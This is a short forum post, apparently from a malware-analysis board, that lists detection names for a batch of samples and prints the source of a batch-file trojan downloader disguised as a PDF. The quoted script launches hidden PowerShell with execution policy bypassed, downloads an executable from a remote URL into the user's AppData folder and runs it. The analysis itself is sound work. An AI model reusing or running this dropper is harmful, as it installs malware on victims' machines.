ikolor wrote:Next ..
No I do not have it.
https://www.virustotal.com/en/file/7dba ... /analysis/
https://www.virustotal.com/en/file/ccd3 ... 467829542/
t3.exe - Ransom/Falock
complaint65648.pdf.bat - PowerShell/Ploprolo (trojan downloader)
email.exe - MSIL/Silog (PWS)
ewinoz.exe - MSIL/Silog (PWS)
updater.exe - MSIL/Noancooe
From my point of view, most interesting in this package of complete crapware (even for malware standards) is Ploprolo
Code: Select all@ECHO OFF
start /min
REM  QBFC Project Options Begin
REM  HasVersionInfo: Yes
REM  Companyname: Tbfdgrsbnfouhdfbvifdb LLC
REM  Productname: ifnbfdnibdfbijdfn
REM  Filedescription: 
REM  Copyrights: Copyright 2013. All Rights Reserved. vojnfdjbnijdfbnidf LLC
REM  Trademarks: 
REM  Originalname: 
REM  Comments: 
REM  Productversion:  1. 3. 1. 2
REM  Fileversion:  1. 3. 0. 2
REM  Internalname: 
REM  Appicon: 
REM  AdministratorManifest: No
REM  QBFC Project Options End
@echo off
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://s3-us-west-1.amazonaws.com/docs.pdf/t4.exe','%APPDATA%\winstrt.exe'); cmd /c '%APPDATA%\winstrt.exe'
 
So this zoo moved to dedicated thread.